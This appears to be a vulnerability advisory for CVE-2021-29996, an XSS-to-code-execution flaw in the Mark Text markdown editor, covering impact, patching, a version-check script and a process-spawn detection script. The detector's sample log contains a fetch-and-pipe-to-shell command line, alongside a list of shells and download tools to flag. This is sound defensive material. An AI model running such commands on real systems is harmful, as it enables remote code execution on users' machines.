CVE-2021-29996

9.6 CRITICAL (CVSS v3.1 base score)

📋 TL;DR

CVE-2021-29996 is a critical vulnerability in Mark Text, an Electron-based markdown editor. A crafted .md file carrying an XSS payload executes JavaScript inside the editor window when the file is rendered, and from there the payload can run arbitrary operating-system commands with the privileges of the user who opened the file. All users of Mark Text 0.16.3 and earlier who open untrusted markdown files are affected; the outcome is compromise of that user's account, and of the whole machine if the user has administrative rights.

💻 Affected Systems

Products:
  • Mark Text
Versions: All versions through 0.16.3
Operating Systems: Windows, macOS, Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Every default installation is vulnerable. Exploitation requires user interaction: the victim must open the malicious .md file in Mark Text.

📦 What is this software?

Mark Text is a free, open-source markdown editor built on Electron and distributed for Windows, macOS and Linux. It renders markdown to HTML live in the editor window, which is the code path this vulnerability abuses.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Commands run with the victim's privileges; if that user is an administrator, the attacker gains complete control over the machine, enabling data theft, ransomware deployment, and lateral movement within the network.

🟠

Likely Case

Arbitrary code execution in the context of the user who opened the file (this is not a privilege-escalation bug by itself), leading to data exfiltration, malware installation, or persistence mechanisms being established on the affected system.

🟢

If Mitigated

Limited impact if the user runs without administrative rights, the application is sandboxed or run in a VM, and only trusted markdown files are opened.

🌐 Internet-Facing: LOW (Mark Text is primarily a desktop application, not typically internet-facing)
🏢 Internal Only: HIGH (a user who opens a malicious markdown file received as an email attachment, through chat, or from a shared drive is compromised)

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: Not confirmed (the public PoC needs little adaptation)
Unauthenticated Exploit: N/A (desktop application; no authentication is involved, but the victim must open the file)
Complexity: LOW

Exploitation requires the victim to open a malicious .md file in Mark Text. A proof of concept in the upstream GitHub issue (#2548) shows XSS payloads embedded in a markdown file reaching command execution.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: the first Mark Text release after 0.16.3 (every release through 0.16.3 is affected)

Upstream issue: https://github.com/marktext/marktext/issues/2548

Restart Required: Yes (restart Mark Text after installing; a system reboot is not needed)

Instructions:

1. Download the latest version from the official GitHub releases page (https://github.com/marktext/marktext/releases).
2. Uninstall the old version.
3. Install the new version.
4. Restart Mark Text and confirm the version in Help > About is newer than 0.16.3.

🔧 Temporary Workarounds

Avoid opening untrusted markdown files (all platforms)

Only open .md files from trusted sources. Until patched, treat any markdown file that arrives by email, chat, or download as potentially malicious.

Use an alternative markdown editor (all platforms)

Temporarily switch to another markdown editor such as Typora, VS Code, or Obsidian until Mark Text is patched.

🧯 If You Can't Patch

  • Run Mark Text in a sandboxed environment or virtual machine to limit the damage a malicious file can do
  • Use application allowlisting (for example AppLocker or WDAC on Windows) to block shells and interpreters spawned by Mark Text; note that the payload itself runs inside the Mark Text process, so allowlisting only stops what it launches afterwards

🔍 How to Verify

Check if Vulnerable:

Open Help > About in Mark Text. If the version shown is 0.16.3 or earlier, the installation is vulnerable.

Check Version:

On Linux: run marktext --version (the binary must be on PATH). On macOS: check Help > About, or run the executable inside the app bundle with --version. On Windows: check Help > About.

Verify Fix Applied:

After updating, confirm in Help > About that the version is newer than 0.16.3.
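The version check above, written so it can be scripted across a fleet. This is an added example, not the advisory's or the Mark Text project's own code. It assumes the binary is named marktext and is on PATH, and that running it with --version prints the version (Electron's built-in flag); the vulnerable/patched decision itself relies only on the advisory's "through 0.16.3" boundary and compares version components numerically, so 0.16.10 is correctly treated as newer than 0.16.3:

```python
"""Decide whether an installed Mark Text is at or below 0.16.3 (CVE-2021-29996).

Added example, not part of the original advisory or the Mark Text project.
Assumptions: the binary is called `marktext`, is on PATH, and prints its
version when run with --version (Electron's built-in flag).
"""
import re
import shutil
import subprocess
from typing import Optional, Tuple

# Last affected release per the advisory ("all versions through 0.16.3").
LAST_AFFECTED = (0, 16, 3)

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Extract the first X.Y.Z triple from text such as "v0.16.3" or "Mark Text 0.16.3"."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch = (int(g) for g in m.groups())
    return (major, minor, patch)


def is_vulnerable(version_text: str) -> Optional[bool]:
    """True if the version is 0.16.3 or older, False if newer, None if unparseable.

    Tuple comparison compares each component as an integer, which a plain
    string comparison would get wrong ("0.16.10" < "0.16.3" as strings).
    """
    v = parse_version(version_text)
    if v is None:
        return None
    return v <= LAST_AFFECTED


def installed_version(binary: str = "marktext") -> Optional[str]:
    """Run the binary with --version and return its output, or None if unavailable.

    The binary name is an assumption; point it at the AppImage or the
    executable inside the macOS app bundle if that is how Mark Text is installed.
    """
    path = shutil.which(binary)
    if path is None:
        return None
    try:
        out = subprocess.run([path, "--version"], capture_output=True, text=True, timeout=15)
    except (OSError, subprocess.SubprocessError):
        return None
    return (out.stdout or out.stderr).strip() or None


if __name__ == "__main__":
    text = installed_version()
    if text is None:
        print("Mark Text binary not found on PATH; check Help > About instead.")
    else:
        state = is_vulnerable(text)
        verdict = "unknown version format" if state is None else ("VULNERABLE" if state else "patched")
        print(f"reported {text!r}: {verdict}")
```

If the tool reports "unknown version format", the binary printed something other than a version string; fall back to Help > About rather than trusting the script.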

📡 Detection & Monitoring

Log Indicators:

  • Child processes of the Mark Text process that are shells or script interpreters (cmd.exe, powershell.exe, sh, osascript); note that Mark Text, like any Electron application, legitimately spawns helper processes that share its own executable name
  • Command lines under Mark Text that download and execute content
  • Unexpected network connections initiated by the Mark Text process

Network Indicators:

  • Outbound connections to suspicious domains/IPs from Mark Text process
  • Unexpected data exfiltration patterns

SIEM Query:

process_name:"Mark Text" AND (process_spawn:* OR network_connection:*)

The field names above are placeholders; map them to your SIEM's schema. The process name also differs by platform ("Mark Text.exe" on Windows, "Mark Text" on macOS, "marktext" on Linux), and a query on child-process creation alone will also match Mark Text's own helper processes, so filter those out or alert only on interpreter and shell children.
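The process-spawn indicator above turned into detection logic and run over sample telemetry, as an added example that is not part of the original advisory. The log records are constructed, in a Sysmon-like shape; the field names Image, ParentImage and CommandLine, and the per-platform image names for Mark Text, are assumptions to map onto your own schema. The logic encodes the caveat that Mark Text spawns helper processes with its own image, so "any child of Mark Text" is a noisy rule: helpers are skipped, shells and interpreters are alerted on, and anything else is returned for lower-priority review:

```python
"""Flag suspicious child processes of Mark Text in process-creation telemetry.

Added example, not part of the original advisory. Field names and the Mark
Text image names are assumptions; the sample log below is constructed.
"""
import json
from pathlib import PurePath
from typing import Dict, List

# Executable names Mark Text uses on each platform (lower-cased basenames; assumed).
MARKTEXT_IMAGES = {"marktext", "mark text", "mark text.exe"}

# Interpreters and launchers a markdown editor has no reason to start.
# A payload that reaches Node's child_process from the renderer lands here.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe",
    "sh", "bash", "zsh", "osascript", "python", "python3", "curl", "wget",
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return PurePath(path.replace("\\", "/")).name.lower()


def is_marktext(image: str) -> bool:
    return basename(image) in MARKTEXT_IMAGES


def classify(event: Dict[str, str]) -> str:
    """Return 'benign', 'helper', 'suspicious' or 'review' for one process-creation event."""
    if not is_marktext(event.get("ParentImage", "")):
        return "benign"        # not a child of Mark Text at all
    child = basename(event.get("Image", ""))
    if child in MARKTEXT_IMAGES:
        return "helper"        # Electron renderer/GPU helpers share the app's executable
    if child in SUSPICIOUS_CHILDREN:
        return "suspicious"
    return "review"            # unknown child (e.g. xdg-open for a clicked link): look, but lower priority


def detect(log_lines: List[str]) -> List[Dict[str, str]]:
    """Parse JSON lines and return the events that are suspicious children of Mark Text."""
    hits: List[Dict[str, str]] = []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue           # skip malformed telemetry rather than crash the rule
        if classify(event) == "suspicious":
            hits.append(event)
    return hits


# Constructed sample telemetry (not real logs). 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = r"""
{"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Users\\alice\\AppData\\Local\\Programs\\marktext\\Mark Text.exe", "CommandLine": "cmd.exe /c calc.exe"}
{"Image": "C:\\Users\\alice\\AppData\\Local\\Programs\\marktext\\Mark Text.exe", "ParentImage": "C:\\Users\\alice\\AppData\\Local\\Programs\\marktext\\Mark Text.exe", "CommandLine": "\"Mark Text.exe\" --type=renderer"}
{"Image": "/bin/sh", "ParentImage": "/usr/bin/marktext", "CommandLine": "sh -c curl http://203.0.113.5/x | sh"}
{"Image": "/usr/bin/sh", "ParentImage": "/usr/bin/bash", "CommandLine": "sh -c ls"}
{"Image": "/usr/bin/xdg-open", "ParentImage": "/usr/bin/marktext", "CommandLine": "xdg-open https://github.com"}
"""


def run_sample() -> List[str]:
    """Command lines of the suspicious events found in SAMPLE_LOG."""
    return [e["CommandLine"] for e in detect(SAMPLE_LOG.splitlines())]


if __name__ == "__main__":
    for cmd in run_sample():
        print("ALERT: Mark Text spawned:", cmd)
```

On the sample, the cmd.exe and /bin/sh children fire, the renderer helper is ignored, the sh started by bash is unrelated, and xdg-open is left for review: that last case is the kind of benign child a blanket "any spawn" rule would page on every time a user clicks a link.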

🔗 References

  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2021-29996
  • Upstream issue with proof of concept: https://github.com/marktext/marktext/issues/2548